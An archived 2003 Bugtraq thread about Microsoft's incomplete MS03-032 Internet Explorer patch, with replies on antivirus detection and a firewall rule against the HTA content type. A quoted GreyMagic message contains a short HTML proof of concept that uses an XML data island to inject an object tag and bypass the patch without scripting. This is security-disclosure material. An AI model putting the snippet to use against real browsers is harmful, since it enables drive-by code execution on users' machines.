Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Drew Copley" <dcopley () eeye com>
Date: Mon, 8 Sep 2003 14:55:14 -0700

Some AV will catch these because of malware's exploit code which he has
reused. Some AV will catch this because of greymagic's exploit code. Which
is all fine and good, a bit like a magic trick. Yes, the demonstration
exploit is caught... But the worm or trojan exploit someone maliciously
sends to your system -- this won't be caught. 

The only sure way to detect this, I already wrote about [to Bugtraq]. That
is by setting a firewall rule which blocks the dangerous mimetype string
[Content-Type: application/hta]. Everything else in the exploit can change. 

But, why merely detect it and risk encoded and other types of AV/IDS/IPS
evading techniques? Why not just do this fix? I think, ultimately, it
depends on how safe you want to be. Some people do not mind having their
systems be at risk. That is their choice. 



-----Original Message-----
From: ADBecker () chmortgage com [mailto:ADBecker () chmortgage com] 
Sent: Monday, September 08, 2003 12:17 PM
To: GreyMagic Software
Cc: Bugtraq; full-disclosure () lists netsys com; 
http-equiv () excite com; NTBugtraq; Microsoft Security Response 
Center; vulnwatch () vulnwatch org
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032







Updated antivirus software should catch this exploit and 
prevent any application from being launched. We have McAfee 
VirusScan 7 Ent. which caught both exploit examples at 
http://greymagic.com/adv/gm001-ie/

Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383


                                                              
                                                              
           
                      "GreyMagic                              
                                                              
           
                      Software"                To:       
"NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq"     
                
                      <security () greymag         
<bugtraq () securityfocus com>, 
<full-disclosure () lists netsys com>,                       
                      ic.com>                   
<vulnwatch () vulnwatch org>                                     
                         
                                               cc:       
<http-equiv () excite com>, "Microsoft Security Response Center" 
                
                      09/08/03 07:52 AM         
<secure () microsoft com>, (bcc: Andrew D Becker/Continental 
Homes)                       
                                               Subject:  RE: 
BAD NEWS: Microsoft Security Bulletin MS03-032                
            
                                                              
                                                              
           




The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as 
http://greymagic.com/adv/gm001-ie/, which > explains the 
problem in detail. Microsoft again patches the object element 
in HTML, but it doesn't patch the dynamic version of that 
same element.

1. Disable Active Scripting

This actually means that no scripting is needed at all in 
order to exploit this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" 
dataformatas="html"></span> <xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.











  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]